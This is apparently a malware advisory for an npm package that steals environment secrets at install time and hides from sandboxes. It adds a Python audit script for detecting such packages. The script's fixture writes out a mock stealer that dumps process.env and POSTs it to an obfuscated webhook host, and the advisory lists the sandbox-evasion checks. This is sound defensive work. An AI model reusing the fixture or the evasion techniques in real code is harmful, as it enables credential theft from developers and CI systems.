MAL-2026-6597
Malicious code in @longzy/react-native-polyfill (npm)
Details
This npm package is purpose-built malware that exfiltrates host information and environment secrets. It runs as a postinstall hook (the keyword "postinstall" is obfuscated in the code) and exits immediately if npm_package_name is unset, confirming that it only fires during npm install. After a randomized 15-45 second delay it collects host information (hostname, username, platform, Node version, non-internal IPs, and the registry URL) and dumps the entire process.env, which in CI and developer environments routinely contains tokens, AWS keys, and other secrets, then POSTs all of it to an attacker-controlled endpoint.

The C2 destination is obfuscated in two ways: the host decoder (reverse, then subtract 7 from each character code) yields open.feishu.cn, and the payload is formatted as a Feishu/Lark bot webhook message (msg_type: "text"), so the stolen data lands in an attacker's Lark chat. The exfiltration path is XOR-decoded with the key "Zk9x".

The bulk of the code is anti-analysis. It silently calls process.exit(0) if it detects any of the following: honeypot canary tokens (AKIAIOSFODNN7EXAMPLE and the matching AWS example secret, fake-token regexes such as F4k3T0k3n, "honey"); researcher/sandbox environment variables and prefixes (DetonationLogFilePath, PYPI_POISON_HONEY_TOKEN, THREAT_ANALYZER_MODEL, ASPECT_TLOG, and prefix scans for SANDYCLAW_, OPENCLAW_, PERMISO_, CHAINRADAR_); a resolved-registry string containing "supplysec"; NODE_OPTIONS with a --require hook; mock CA paths under /tmp/mock; the NODE_TLS_REJECT_UNAUTHORIZED/profiling combination; 3 or more CI providers set at once (GitHub Actions, GitLab, CircleCI, Buildkite); sandbox hostnames (detonat|cuckoo|virus|scan|chainradar); sandbox usernames (sandbox, malware, scan, etc.); or a HOME path containing "openclaw". The char-code/XOR/reverse encoding and the "Build Environment Telemetry" comments exist purely to hide the environment-variable names, the C2 host, and the path from casual review and log scanners.
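The behaviours described above lend themselves to a small install-script audit. The following is an added example (not code from the advisory or from the package): it flags install-time lifecycle hooks and the indicators the advisory names, and includes a decoder for the reverse-plus-shift host obfuscation. The indicator regexes and the sample fixture are constructed assumptions, not the real package contents.

```python
"""Triage helper for npm install-time scripts, modelled on the behaviours
described in MAL-2026-6597. Added example, not code from the advisory."""
import re

# Lifecycle phases npm runs automatically during `npm install`.
INSTALL_PHASES = ("preinstall", "install", "postinstall")

# Indicators drawn from the advisory text, as (label, regex) pairs.
INDICATORS = [
    ("dumps whole process.env", re.compile(r"JSON\.stringify\(\s*process\.env\s*\)")),
    ("char-code string assembly", re.compile(r"String\.fromCharCode|charCodeAt")),
    ("reverse-string decoding", re.compile(r"\.split\(['\"]{2}\)\.reverse\(\)")),
    ("randomised delay", re.compile(r"setTimeout[\s\S]*?Math\.random")),
    ("outbound HTTP request", re.compile(r"\bhttps?\.request\(|\bfetch\(")),
    ("webhook-style payload", re.compile(r"msg_type")),
    ("npm lifecycle gate", re.compile(r"npm_package_name|npm_lifecycle_event")),
]

def audit_package(package_json: dict, script_source: str) -> list[str]:
    """Return findings for one dependency; empty if nothing runs at install time."""
    scripts = package_json.get("scripts", {})
    hooks = [p for p in INSTALL_PHASES if p in scripts]
    if not hooks:
        return []
    findings = [f"install-time hook(s): {', '.join(hooks)}"]
    findings += [label for label, rx in INDICATORS if rx.search(script_source)]
    return findings

def risk_score(findings: list[str]) -> int:
    """Indicators beyond the hook itself; three or more warrants manual review."""
    return max(0, len(findings) - 1)

def decode_reverse_shift(encoded: str, shift: int = 7) -> str:
    """Undo the advisory's host obfuscation: reverse, then subtract `shift`."""
    return "".join(chr(ord(c) - shift) for c in reversed(encoded))

# Constructed fixture echoing the advisory's description; not the real payload.
SAMPLE_PKG = {"name": "example-pkg", "scripts": {"postinstall": "node setup.js"}}
SAMPLE_SRC = """
// Build Environment Telemetry
if (!process.env.npm_package_name) process.exit(0);
setTimeout(function () {
  var host = 'uj5|ozplm5ulwv'.split('').reverse().map(function (c) {
    return String.fromCharCode(c.charCodeAt(0) - 7); }).join('');
  var body = JSON.stringify({ msg_type: 'text', env: JSON.stringify(process.env) });
  https.request({ host: host, method: 'POST' });
}, 15000 + Math.random() * 30000);
"""
if __name__ == "__main__":
    print(*audit_package(SAMPLE_PKG, SAMPLE_SRC), sep="\n")
```

Run it against each package.json under node_modules that declares an install-phase script, feeding the referenced script file as script_source; the fixture here scores 7 and its encoded host decodes to open.feishu.cn.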
Affected packages
No fixed version published yet for @longzy/react-native-polyfill (npm). Pin to a known-safe version or switch to an alternative.